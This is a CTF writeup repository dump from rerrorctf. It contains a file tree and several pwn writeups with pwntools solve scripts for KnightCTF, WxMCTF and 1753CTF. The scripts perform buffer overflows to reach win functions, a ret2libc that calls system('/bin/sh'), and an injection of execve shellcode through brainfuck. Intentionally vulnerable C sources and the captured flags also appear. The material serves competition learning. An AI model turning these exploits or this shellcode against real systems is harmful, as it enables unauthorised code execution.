├── 2024_01_20_KnightCTF ├── README.md ├── pwn │ ├── get_sword │ │ ├── get_sword │ │ └── get_sword.md │ ├── secret_scroll │ │ └── secret_scroll.md │ └── win │ │ ├── win │ │ └── win.md ├── rev │ ├── dragons_binary │ │ ├── dragons_binary.md │ │ └── task │ └── knight_armoury │ │ ├── knight_armoury │ │ └── knight_armoury.md ├── steg │ └── flag_hunt.md └── web │ └── kitty │ └── kitty.md ├── 2024_03_09_WxMCTF24 ├── README.md ├── crypto │ └── crypto_3_racing │ │ └── racing.md ├── pwn │ ├── pwn_1_moodle_madness │ │ ├── moodle │ │ └── moodle_madness.md │ ├── pwn_2_tej3m │ │ ├── assgn1_2o3BvZ6 │ │ ├── assgn1_ScZuUx0.c │ │ ├── go.py │ │ └── tej3m.md │ └── pwn_3_nah_id_win │ │ ├── go.py │ │ ├── libc.so.6 │ │ ├── nah_id_win.md │ │ ├── vuln │ │ └── vuln.c └── web │ └── web_4_walmart │ └── Walmart!.md ├── 2024_03_15_1753CTF ├── README.md └── pwn │ ├── brain_frick │ ├── brain-frick.zip │ ├── brain_frick.md │ └── go.py │ ├── brain_heck │ ├── brain-heck.zip │ ├── brain_heck.md │ └── go.py │ ├── matrix_preloaded │ ├── go.py │ ├── matrix-preloaded.zip │ ├── matrix_preloaded.md │ ├── shellcode │ └── shellcode.asm │ └── write_only │ ├── go.py │ ├── write-only.zip │ └── write_only.md ├── 2024_04_07_TamuCTF24 ├── README.md ├── cry │ └── criminal │ │ ├── criminal.md │ │ └── criminal.zip ├── pwn │ ├── admin_panel │ │ ├── admin-panel.zip │ │ └── admin_panel.md │ └── super_lucky │ │ ├── super-lucky.zip │ │ └── super_lucky.md └── rev │ ├── pwndbg.png │ ├── resistant.md │ └── resistant.zip ├── 2024_05_17_BYUCTF24 ├── README.md ├── cry │ ├── are_s_a │ │ ├── cne.txt │ │ └── writeup.md │ └── times │ │ ├── mul_safe.py │ │ ├── times.txt │ │ └── writeup.md ├── fore │ └── Stardust_Whispers │ │ ├── Stardust Whispers.md │ │ ├── Stardust_Whispers.docx │ │ └── fun.pcapng ├── pwn │ ├── all │ │ ├── all.zip │ │ ├── go.py │ │ └── writeup.md │ ├── numbersss │ │ ├── Dockerfile │ │ ├── go.py │ │ ├── numbersss │ │ └── writeup.md │ └── static │ │ ├── go.py │ │ ├── static │ │ └── writeup.md └── web │ ├── argument │ 
└── writeup.md │ ├── not-a-problem │ ├── Writeup.md │ └── not-a-problem.zip │ ├── porg_city │ └── writeup.md │ ├── random │ └── writeup.md │ └── triple-whammy │ ├── Writeup.md │ └── triple-whammy.zip ├── 2024_06_08_Akasec24 ├── README.md └── pwn │ ├── bad_trip │ ├── bad_trip.zip │ ├── go.py │ └── writeup.md │ ├── good_trip │ ├── go.py │ ├── good_trip.zip │ └── writeup.md │ └── warmup │ ├── go.py │ ├── warmup.zip │ └── writeup.md ├── 2024_06_15_jCTF_Teaser24 ├── README.md └── pwn │ ├── go.py │ └── writeup.md ├── 2024_06_21_WaniCTF24 ├── README.md ├── crypto │ ├── beginners_aes │ │ ├── cry-beginners-aes.zip │ │ ├── go.py │ │ └── writeup.md │ ├── beginners_rsa │ │ ├── cry-beginners-rsa.zip │ │ ├── go.py │ │ └── writeup.md │ ├── dance │ │ ├── cry-dance.zip │ │ ├── go.py │ │ └── writeup.md │ └── replacement │ │ ├── cry-replacement.zip │ │ ├── go.py │ │ └── writeup.md ├── misc │ └── sh │ │ ├── mis-sh.zip │ │ └── writeup.md ├── pwn │ ├── do_not_rewrite │ │ ├── go.py │ │ ├── pwn-do-not-rewrite.zip │ │ └── writeup.md │ └── do_not_rewrite2 │ │ ├── go.py │ │ ├── pwn-do-not-rewrite2.zip │ │ └── writeup.md ├── rev │ ├── home │ │ ├── go.py │ │ ├── rev-home.zip │ │ └── writeup.md │ └── thread │ │ ├── go.py │ │ ├── rev-thread.zip │ │ └── writeup.md └── web │ ├── elec │ └── writeup.md │ ├── noscript │ └── writeup.md │ └── one-day-one-letter │ └── writeup.md ├── 2024_06_29_UIUCTFCTF24 ├── README.md ├── crypto │ ├── without_a_trace │ │ ├── go.py │ │ ├── server.py │ │ └── writeup.md │ └── x_marked_the_spot │ │ ├── ct │ │ ├── go.py │ │ ├── public.py │ │ └── writeup.md ├── misc │ ├── push_and_pickle │ │ ├── chal.py │ │ ├── chal_part2.py │ │ └── writeup.md │ └── slot-machine │ │ ├── chal.py │ │ └── writeup.md ├── pwn │ └── syscalls │ │ ├── Dockerfile │ │ ├── Dockerfile.local │ │ ├── go.py │ │ ├── syscalls │ │ └── writeup.md └── web │ └── fare-evasion │ └── writeup.md ├── 2024_07_06_DUCTF24 ├── README.md ├── pwn │ ├── vector_overflow │ │ ├── go.py │ │ ├── vector_overflow │ │ ├── 
vector_overflow.cpp │ │ └── writeup.md │ └── yawa │ │ ├── go.py │ │ ├── ld-linux-x86-64.so.2 │ │ ├── libc.so.6 │ │ ├── writeup.md │ │ ├── yawa │ │ └── yawa.c └── rev │ └── number_mashing │ ├── go.py │ ├── number-mashing │ └── writeup.md ├── 2024_07_13_OSCTF24 ├── README.md └── pwn │ ├── buffer_buffet │ ├── go.py │ ├── vuln │ └── writeup.md │ ├── byte_breakup │ ├── go.py │ ├── vuln │ └── writeup.md │ ├── coal_mine_canary │ ├── challenge │ ├── go.py │ └── writeup.md │ ├── leaky_pipes │ ├── go.py │ ├── leaky_pipes │ └── writeup.md │ ├── lib_riddle │ ├── challenge │ ├── go.py │ └── writeup.md │ ├── seed_spring │ ├── go.py │ ├── seed_spring │ └── writeup.md │ └── shell_mischief │ ├── go.py │ ├── vuln │ └── writeup.md ├── 2024_07_19_Imaginary24 ├── README.md ├── crypto │ ├── base64 │ │ ├── files.zip │ │ ├── go.py │ │ └── writeup.md │ └── tango │ │ ├── files.zip │ │ ├── go.py │ │ └── writeup.md ├── misc │ ├── gdbjail1 │ │ └── writeup.md │ ├── gdbjail2 │ │ └── writeup.md │ ├── ok-nice │ │ ├── jail.py │ │ └── writeup.md │ └── starship │ │ ├── files.zip │ │ ├── go.py │ │ └── writeup.md ├── pwn │ └── imgstore │ │ ├── files.zip │ │ ├── go.py │ │ └── writeup.md └── web │ └── journal │ └── writeup.md ├── 2024_07_26_DeadSecCTF24 ├── README.md ├── crypto │ └── flag_killer │ │ ├── go.py │ │ ├── public.zip │ │ └── writeup.md └── pwn │ └── super_cpp_calculator │ ├── go.py │ ├── public.zip │ └── writeup.md ├── 2024_08_03_TFCCTF24 ├── README.md ├── crypto │ ├── biased_elections │ │ ├── biased_elections.zip │ │ ├── go-sage.py │ │ ├── go.py │ │ └── writeup.md │ ├── ccccc │ │ ├── ccccc.txt │ │ ├── go.py │ │ └── writeup.md │ ├── conway │ │ ├── conway.zip │ │ ├── go.py │ │ └── writeup.md │ └── genetics │ │ ├── go.py │ │ ├── task.txt │ │ └── writeup.md ├── pwn │ └── guard_the_bypass │ │ ├── chall.zip │ │ ├── go.py │ │ └── writeup.md ├── rev │ ├── functional │ │ ├── functional.zip │ │ ├── go.py │ │ └── writeup.md │ └── signal │ │ ├── go.c │ │ ├── inscount.py │ │ ├── signal │ │ ├── worker.c │ 
│ └── writeup.md └── web │ ├── flask-destroyer │ └── writeup.md │ ├── funny │ └── writeup.md │ └── surfing │ └── writeup.md ├── 2024_08_10_LITCTF24 ├── README.md └── crypto │ ├── chal.py │ ├── go.py │ └── writeup.md ├── 2024_08_17_idekCTF24 └── README.md ├── 2024_09_06_CSAWQuals24 ├── README.md └── crypto │ ├── cbc │ ├── app.py │ ├── go.py │ ├── out.txt │ └── writeup.md │ └── trapdoor │ ├── go.py │ ├── msg1.enc │ ├── msg2.enc │ ├── public_key1 │ ├── public_key2 │ └── writeup.md ├── 2024_09_20_PatriotCTF ├── README.md └── crypto │ ├── bigger_is_better │ ├── dist.txt │ ├── go.py │ ├── go.sage │ └── writeup.md │ ├── bit_by_bit │ ├── go.py │ ├── out.txt │ ├── transmit.py │ └── writeup.md │ ├── hard_to_implement │ ├── cryptor.py │ ├── go.py │ └── writeup.md │ ├── high_roller │ ├── flag.enc │ ├── gen_setup.7z │ ├── go.py │ └── writeup.md │ └── idk_cipher │ ├── encode.py │ ├── go.py │ └── writeup.md ├── 2024_09_28_BuckeyeCTF24 ├── README.md ├── crypto │ ├── hashbrown │ │ ├── go.py │ │ ├── hashbrown.py │ │ └── writeup.md │ ├── rsa │ │ ├── go.py │ │ ├── rsa.py │ │ └── writeup.md │ └── xnor │ │ ├── go.py │ │ ├── writeup.md │ │ ├── xnor.py │ │ └── xnor_output.txt └── pwn │ ├── calculator │ ├── calc │ ├── go.py │ └── writeup.md │ ├── color │ ├── color.zip │ ├── go.py │ └── writeup.md │ ├── no_handouts │ ├── go.py │ ├── no_handouts.zip │ └── writeup.md │ ├── runway0 │ ├── go.py │ ├── runway0.zip │ └── writeup.md │ ├── runway1 │ ├── go.py │ ├── runway1.zip │ └── writeup.md │ ├── runway2 │ ├── go.py │ ├── runway2.zip │ └── writeup.md │ └── runway3 │ ├── go.py │ ├── runway3.zip │ └── writeup.md ├── 2024_10_12_BlueWaterCTF24 ├── README.md ├── crypto │ └── MD5.01 │ │ ├── go.py │ │ ├── main.py │ │ └── writeup.md ├── rev │ └── maybe_Checker │ │ ├── go.py │ │ ├── maybe_checker │ │ └── writeup.md └── web │ └── sandevistan │ └── writeup.md ├── 2024_10_19_SunshineCTF24 ├── README.md ├── crypto │ └── adventure_cipher │ │ ├── go.py │ │ ├── letter.txt │ │ └── writeup.md └── pwn │ ├── 
adventure_on_the_high_c │ ├── Dockerfile │ ├── go.py │ ├── ship.bin │ └── writeup.md │ └── flag_shop │ ├── flagshop │ ├── go.py │ └── writeup.md ├── 2024_10_25_HeroCTF24 ├── README.md ├── crypto │ ├── halloween │ │ ├── go.py │ │ ├── halloween.zip │ │ └── writeup.md │ ├── interpolation │ │ ├── go.py │ │ ├── go.sage │ │ ├── interpolation.zip │ │ ├── points.txt │ │ └── writeup.md │ └── paranoia │ │ ├── go.py │ │ ├── paranoia.zip │ │ └── writeup.md └── pwn │ ├── bankrupst │ ├── bankrupst │ ├── bankrupst.rs │ ├── go.py │ └── writeup.md │ └── heappie │ ├── go.py │ ├── heappie.zip │ └── writeup.md ├── 2024_11_01_HackTheVote24 ├── README.md └── pwn │ └── comma_club │ ├── comma-club.tar.gz │ ├── go.py │ └── writeup.md ├── 2024_11_10_BlueHens24 ├── README.md ├── crypto │ ├── hmac │ │ ├── dist.py │ │ ├── go.py │ │ └── writeup.md │ ├── intro_to_rsa │ │ ├── go.py │ │ └── writeup.md │ └── simon_says │ │ ├── go.py │ │ ├── simon_ctf.py │ │ └── writeup.md ├── pwn │ ├── intro_to_pwn │ │ ├── go.py │ │ ├── pwnme │ │ └── writeup.md │ ├── pure_write_what_where │ │ ├── go.py │ │ ├── pwnme │ │ └── writeup.md │ └── ret2bf │ │ ├── go.py │ │ ├── ret2bf.zip │ │ └── writeup.md ├── web │ ├── firefun_3 │ │ └── Writeup.md │ └── just-a-day-at-the-breach │ │ ├── go.py │ │ └── writeup.md └── xor │ ├── cbc_encrypted │ ├── cbcfun_lambda.py │ ├── go.py │ └── writeup.md │ ├── ctr_mode_is_just_xor │ ├── go.py │ ├── lambda.py │ └── writeup.md │ ├── roman_xor │ ├── go.py │ ├── romanXor.py │ └── writeup.md │ └── xor_without_xor │ ├── go.py │ └── writeup.md ├── 2024_11_15_1337UP24 ├── README.md ├── crypto │ ├── krsa │ │ ├── go.py │ │ ├── kRSA.py │ │ └── writeup.md │ └── schrodingers_pad │ │ ├── go.py │ │ ├── schrodingers_pad.zip │ │ └── writeup.md ├── pwn │ ├── floormat_mega_sale │ │ ├── floormat_sale.zip │ │ ├── go.py │ │ └── writeup.md │ ├── retro2win │ │ ├── go.py │ │ ├── retro2win.zip │ │ └── writeup.md │ ├── rigged_slot_machine_2 │ │ ├── go.py │ │ ├── rigged_slot2.zip │ │ └── writeup.md │ └── uap │ │ 
├── go.py │ │ ├── uap.zip │ │ └── writeup.md └── rev │ └── secure_bank │ ├── go.py │ ├── secure_bank │ └── writeup.md ├── 2024_11_22_GlacierCTF24 ├── README.md ├── blockchain │ └── ArcticVault │ │ └── writeup.md └── crypto │ └── rivest_shamir_adleman_germain │ ├── go.py │ ├── rsag.tar.gz │ └── writeup.md ├── 2024_11_30_WWCTF24 ├── README.md ├── crypto │ └── simpler_rsa │ │ ├── chal.py │ │ ├── go.sage │ │ ├── out.txt │ │ └── writeup.md └── pwn │ ├── go.py │ ├── white_rabbit │ └── writeup.md ├── 2024_12_13_NiteCTF24 ├── README.md └── pwn │ ├── mixed_signal │ ├── go.py │ ├── handout.zip │ └── writeup.md │ └── print_the_gifts │ ├── go.py │ ├── handout.zip │ └── writeup.md ├── 2025_01_11_UofTCTF25 ├── README.md ├── forensics │ └── poof │ │ └── writeup.md └── pwn │ ├── baby_pwn │ ├── baby-pwn.zip │ ├── go.py │ └── writeup.md │ └── baby_pwn_2 │ ├── baby-pwn-2.zip │ ├── go.py │ └── writeup.md ├── 2025_01_18_SrdnlenCTF25 └── README.md ├── 2025_01_24_x3CTF25 ├── README.md ├── crypto │ └── curved-mvm │ │ ├── curved-mvm.tar.gz │ │ ├── go.py │ │ └── writeup.md ├── pwn │ ├── devnull-as-a-service │ │ ├── devnull-as-a-service.tar.gz │ │ ├── go.py │ │ └── writeup.md │ └── secure-sandbox │ │ ├── go.py │ │ └── secure-sandbox.tar.gz └── web │ ├── kittyconvert │ └── writeup.md │ └── submission │ └── writeup.md ├── 2025_02_01_BearcatCTF25 ├── README.md ├── crypto │ └── sqRSA │ │ ├── go.py │ │ ├── output.txt │ │ ├── sqRSA.py │ │ └── writeup.md └── pwn │ └── calling_convention │ ├── calling_convention.zip │ ├── go.py │ └── writeup.md ├── 2025_02_07_BITSCTF25 ├── README.md ├── crypto │ ├── alice_n_bob_in_wonderland │ │ ├── chall.py │ │ ├── go.py │ │ └── writeup.md │ └── baby_crypto │ │ ├── go.py │ │ └── writeup.md └── pwn │ ├── baby_pwn │ ├── go.py │ ├── main │ └── writeup.md │ └── biscuits │ ├── go.py │ ├── main │ └── writeup.md ├── 2025_02_15_BroncoCTF25 └── README.md ├── 2025_02_15_EHAXCTF25 ├── README.md └── pwn │ ├── cash_memo │ ├── chall.zip │ ├── go.py │ └── writeup.md │ └── 
fantastic_doom │ ├── chall.zip │ ├── go.py │ └── writeup.md ├── 2025_02_28_ApoorvCTF25 ├── README.md └── pwn │ ├── the_first_visit │ ├── files.zip │ ├── go.py │ └── writeup.md │ └── the_secret_blend │ ├── files.zip │ ├── go.py │ └── writeup.md ├── 2025_02_28_PwnMeCTFQuals25 ├── README.md ├── crypto │ └── easy_diffy │ │ ├── easy_diffy.zip │ │ ├── go.py │ │ └── writeup.md └── pwn │ └── got │ ├── go.py │ ├── got.zip │ └── writeup.md ├── 2025_03_07_KalmarCTF25 ├── Ez ⛳ v3 │ └── writeup.md ├── README.md └── dnxss │ └── writeup.md ├── 2025_03_07_PearlCTF25 ├── README.md ├── crypto │ ├── o1_punch_log │ │ ├── go.py │ │ ├── o_1__punch_log.zip │ │ └── writeup.md │ └── stegano_ellipto_graphy │ │ ├── go.py │ │ ├── hacked.zip │ │ └── writeup.md └── pwn │ ├── mr_ropot │ ├── go.py │ ├── mrropot.zip │ └── writeup.md │ ├── readme_please │ ├── go.py │ ├── readme_src.zip │ └── writeup.md │ └── treasure_hunt │ ├── go.py │ ├── treasurehunt.zip │ └── writeup.md ├── 2025_03_14_UTCTF25 ├── README.md ├── crypto │ ├── DCΔ │ │ ├── go.py │ │ ├── rsa.txt │ │ └── writeup.md │ ├── RSA │ │ ├── go.py │ │ ├── rsa.txt │ │ └── writeup.md │ └── espathra-csatu-banette │ │ ├── go.py │ │ ├── main.py │ │ └── writeup.md └── pwn │ ├── RETirement_plan │ ├── go.py │ ├── libc.so.6 │ ├── shellcode │ └── writeup.md │ └── secbof │ ├── Dockerfile │ ├── chal │ ├── go.py │ ├── start.sh │ └── writeup.md ├── 2025_03_15_Nowruz1404 ├── README.md ├── crypto │ ├── ez_rsa │ │ ├── EZ_RSA.py │ │ ├── go.py │ │ └── writeup.md │ └── ez_xor │ │ ├── EZ_XOR.py │ │ ├── go.py │ │ └── writeup.md └── pwn │ ├── seen_guessing │ ├── chall │ ├── go.py │ └── writeup.md │ └── seen_shop │ ├── go.py │ ├── seen-shop.c │ └── writeup.md ├── 2025_03_21_CyberApocalypse25 ├── README.md ├── crypto │ ├── hourcle │ │ ├── crypto_hourcle.zip │ │ ├── go.py │ │ └── writeup.md │ └── traces │ │ ├── crypto_traces.zip │ │ ├── go.py │ │ └── writeup.md └── pwn │ └── quack_quack │ ├── go.py │ ├── pwn_quack_quack.zip │ └── writeup.md ├── 2025_03_21_WolvCTF25 ├── 
README.md ├── crypto │ └── ecb++ │ │ ├── dist.tar.gz │ │ ├── go.py │ │ └── writeup.md └── pwn │ ├── drywall │ ├── dist.tar.gz │ ├── go.py │ └── writeup.md │ └── takenote │ ├── dist.tar.gz │ ├── go.py │ └── writeup.md ├── 2025_03_28_SwampCTF25 ├── README.md ├── crypto │ └── rock_my_password │ │ ├── go.py │ │ └── writeup.md └── pwn │ ├── beginner_pwn_1 │ ├── go.py │ ├── is_admin │ ├── main.c │ └── writeup.md │ ├── beginner_pwn_2 │ ├── binary │ ├── go.py │ └── writeup.md │ └── oh_my_buffer │ ├── binary │ ├── go.py │ └── writeup.md ├── 2025_03_28_TAMUCTF25 ├── README.md ├── crypto │ └── ECC │ │ ├── ecc.tar.gz │ │ ├── go.py │ │ └── writeup.md └── pwn │ └── debug-1 │ ├── debug-1.tar.gz │ ├── go.py │ └── writeup.md ├── 2025_04_04_Squ1rrelCTF25 ├── README.md ├── crypto │ ├── easy_rsa │ │ ├── easy_rsa.txt │ │ ├── go.py │ │ ├── rsa_easy.py │ │ └── writeup.md │ └── xor_101 │ │ └── writeup.md └── pwn │ ├── deja_vu │ ├── Dockerfile │ ├── deja-vu │ ├── go.py │ └── writeup.md │ └── jail │ ├── Dockerfile │ ├── go.py │ ├── prison │ └── writeup.md ├── 2025_04_11_1753CTF25 ├── README.md └── pwn │ └── leakcan │ ├── go.py │ ├── leakcan_chall │ └── writeup.md ├── 2025_04_12_THCon2K25CTF ├── README.md └── pwn │ └── gopwn │ ├── go.py │ ├── gopwn.zip │ └── writeup.md ├── 2025_04_18_DawgCTF25 ├── README.md ├── crypto │ ├── baby_rsa_1 │ │ ├── go.py │ │ ├── output.txt │ │ ├── source.py │ │ └── writeup.md │ └── baby_rsa_2 │ │ ├── chall.py │ │ ├── go.py │ │ ├── output.txt │ │ └── writeup.md └── pwn │ ├── 64_bits_in_my_ark_and_texture │ ├── chall │ ├── go.py │ └── writeup.md │ ├── clobber │ ├── clobber │ ├── go.py │ ├── ld.so │ └── libc.so.6 │ ├── interns_project │ ├── go.py │ ├── interns'Project │ └── writeup.md │ └── just_parry_lol │ ├── frame_trap │ ├── go.py │ └── writeup.md ├── 2025_04_25_UMDCTF25 ├── README.md └── pwn │ └── gambling2 │ ├── Dockerfile │ ├── Makefile │ ├── gambling │ ├── gambling.c │ ├── go.py │ └── writeup.md ├── 2025_05_10_DamCTF25 ├── README.md └── pwn │ └── dnd │ ├── 
dnd.zip │ ├── go.py │ └── writeup.md ├── 2025_05_23_NahamConCTF25 └── README.md ├── 2025_05_24_DaVinciCTF25 └── README.md └── README.md /2024_01_20_KnightCTF/README.md: -------------------------------------------------------------------------------- 1 | # KnightCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2209 4 | 5 | 115th place 980 points 6 | -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/pwn/get_sword/get_sword: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_01_20_KnightCTF/pwn/get_sword/get_sword -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/pwn/win/win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_01_20_KnightCTF/pwn/win/win -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/pwn/win/win.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2209/ 2 | 3 | # win... win... window...! 4 | 5 | You are a skilled hacker known for your expertise in binary exploitation. One day, you receive an anonymous message challenging your abilities. The message contains a mysterious binary file. Now you decide to analyze the file. 6 | 7 | Connection Information 8 | 9 | `nc 173.255.201.51 3337` 10 | 11 | ## Solution 12 | 13 | In `main/0x40118a` there is a call to `gets`, which places no bound on the input, with a buffer on the stack. The return address is 0x12 bytes past the start of that buffer and there is no stack canary, so an over-long input line overwrites it unchecked.
There is a function called `shell/0x401156`, and because the binary is not PIE its address is fixed, so we can simply return to `shell` by overflowing the buffer on the stack in `main` with `gets`. The script returns to 0x401157, one byte past the entry, presumably to skip the function's first instruction and keep the stack 16-byte aligned (the original notes do not say): 14 | 15 | ``` 16 | from pwn import * 17 | 18 | SHELL = 0x00401157 19 | 20 | #p = process("./win") 21 | p = remote("173.255.201.51", 3337) 22 | 23 | p.readline() 24 | 25 | payload = b"A" * 0x12 26 | payload += p64(SHELL) 27 | 28 | p.sendline(payload) 29 | 30 | p.sendline(b"/bin/cat flag.txt") 31 | 32 | p.interactive() 33 | ``` 34 | 35 | ``` 36 | $ python3 ./go.py 37 | [+] Opening connection to 173.255.201.51 on port 3337: Done 38 | [*] Switching to interactive mode 39 | KCTF{r3T_7o_W1n_iS_V3rRY_3AsY}$ 40 | [*] Closed connection to 173.255.201.51 port 3337 41 | ``` 42 | 43 | ## Flag 44 | `KCTF{r3T_7o_W1n_iS_V3rRY_3AsY}` 45 | -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/rev/dragons_binary/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_01_20_KnightCTF/rev/dragons_binary/task -------------------------------------------------------------------------------- /2024_01_20_KnightCTF/rev/knight_armoury/knight_armoury: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_01_20_KnightCTF/rev/knight_armoury/knight_armoury -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/README.md: -------------------------------------------------------------------------------- 1 | # WxMCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2179 4 | 5 | 14th place 4521 points 6 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_1_moodle_madness/moodle: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_09_WxMCTF24/pwn/pwn_1_moodle_madness/moodle -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_1_moodle_madness/moodle_madness.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2179/ 2 | 3 | # WxMCTF '24 Pwn 1 - Moodle Madness - PWN 4 | 5 | It recently came to light from an anonymous source that "Moodle," the math assignment program made famous by Ms. Gugoiu, has an exploit to see the answers to questions. Buddhathe18th, always reluctant to do homework, decided to investigate this exploit himself for the notorious 3.2 STACK Part 2 Challenge. He vaguely recalls that it involves inputting a string into the answer box, but with 1 hour left, he needs some help. Could you help him find the exploit? 6 | 7 | ## Solution 8 | 9 | ``` 10 | $ file ./moodle 11 | ./moodle: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=29daf9cad61702f11a472b1cd65d493b239e3d83, for GNU/Linux 3.2.0, not stripped 12 | ``` 13 | 14 | `d2f6c75e13375d754e8ee747958664cfe4725252c526a9cc048bd54666722075 ./moodle` 15 | 16 | ``` 17 | $ strings ./moodle 18 | cmxw H 19 | m{ft H 20 | ld00 H 21 | 4m_3 H 22 | r3t5 H 23 | dn1m H 24 | }!!! 
H 25 | ``` 26 | Each four-character chunk in the `strings` output is stored reversed (`cmxw` reads `wxmc`), so reversing the chunks and joining them in order gives the flag. 27 | ## Flag 28 | `wxmctf{m00dl3_m45t3rm1nd!!!}` 29 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_2_tej3m/assgn1_2o3BvZ6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_09_WxMCTF24/pwn/pwn_2_tej3m/assgn1_2o3BvZ6 -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_2_tej3m/assgn1_ScZuUx0.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void win(){ 6 | system("cat flag.txt"); 7 | } 8 | 9 | void func(){ 10 | char buf[040]; 11 | while(1) { 12 | puts("Enter your info: \n"); 13 | gets(buf); 14 | if(strlen(buf) < 31) { 15 | puts("Thank you for valid data!!!\n"); 16 | break; 17 | } 18 | puts("My teacher says that's unsafe!\n"); 19 | } 20 | } 21 | 22 | void main() { 23 | setvbuf(stdin, NULL, 2, 0); 24 | setvbuf(stdout, NULL, 2, 0); 25 | func(); 26 | } 27 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_2_tej3m/go.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | REMOTE_IP = "8c7e7da.678470.xyz" 4 | REMOTE_PORT = 30310 5 | 6 | elf = ELF("./assgn1_2o3BvZ6") 7 | 8 | p = remote(REMOTE_IP, REMOTE_PORT) 9 | 10 | p.readuntil(b"Enter your info: \n\n") 11 | 12 | payload = b"0" * 0x2c 13 | payload += p32(elf.sym["win"]) 14 | 15 | p.sendline(payload) 16 | 17 | p.sendline() 18 | 19 | p.interactive() 20 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/go.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | REMOTE_IP = "1cfac3a.678470.xyz" 4 | REMOTE_PORT = 32572 5 | 6 | libc 
= ELF("./libc.so.6") 7 | 8 | p = remote(REMOTE_IP, REMOTE_PORT) 9 | 10 | p.readuntil(b"libc... ") 11 | 12 | leak = int(p.readline().decode(), 16) 13 | libc.address = leak - libc.sym["printf"] 14 | 15 | log.success(f"libc: {hex(libc.address)}") 16 | 17 | payload = b"A" * 0x2c 18 | payload += p32(0x0804900e) # ret < 0x90000000 19 | payload += p32(libc.sym["system"]) 20 | payload += p32(0) 21 | payload += p32(next(libc.search(b"/bin/sh"))) 22 | 23 | p.sendline(payload) 24 | 25 | p.interactive() 26 | -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/libc.so.6 -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/vuln -------------------------------------------------------------------------------- /2024_03_09_WxMCTF24/pwn/pwn_3_nah_id_win/vuln.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int vuln() { 5 | char buf[0x20]; 6 | printf("My cursed technique is revealing libc... 
%p\n",printf); 7 | gets(buf); 8 | if(__builtin_return_address(0) < 0x90000000) { 9 | return 0; 10 | } 11 | printf("NAH I'D WIN!\n"); 12 | exit(0); 13 | } 14 | int main() { 15 | setvbuf(stdin, NULL, 2, 0); 16 | setvbuf(stdout, NULL, 2, 0); 17 | vuln(); 18 | return 0; 19 | } 20 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/README.md: -------------------------------------------------------------------------------- 1 | # 1753CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2234 4 | 5 | 17th place 2810 points 6 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/brain_frick/brain-frick.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/brain_frick/brain-frick.zip -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/brain_frick/go.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | REMOTE_IP = "140.238.91.110" 4 | REMOTE_PORT = 36369 5 | 6 | p = remote(REMOTE_IP, REMOTE_PORT) 7 | 8 | p.readuntil(b"Enter your code:\n") 9 | 10 | compiled_end = b"\x48\xC7\xC0\x3C\x00\x00\x00\x0F\x05" 11 | 12 | shellcode = b"\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05" 13 | 14 | payload = b"" 15 | for i in range(len(compiled_end)): 16 | payload += b"<" 17 | 18 | for i in range(len(compiled_end)): 19 | payload += b"+" * (int(shellcode[i]) - int(compiled_end[i]) & 0xff) 20 | payload += b">" 21 | 22 | for b in shellcode[len(compiled_end):]: 23 | payload += b"+" * int(b) 24 | payload += b">" 25 | 26 | p.sendline(payload) 27 | 28 | p.clean() 29 | 30 | p.sendline(b"/bin/cat /flag") 31 | 32 | p.interactive() 33 | 
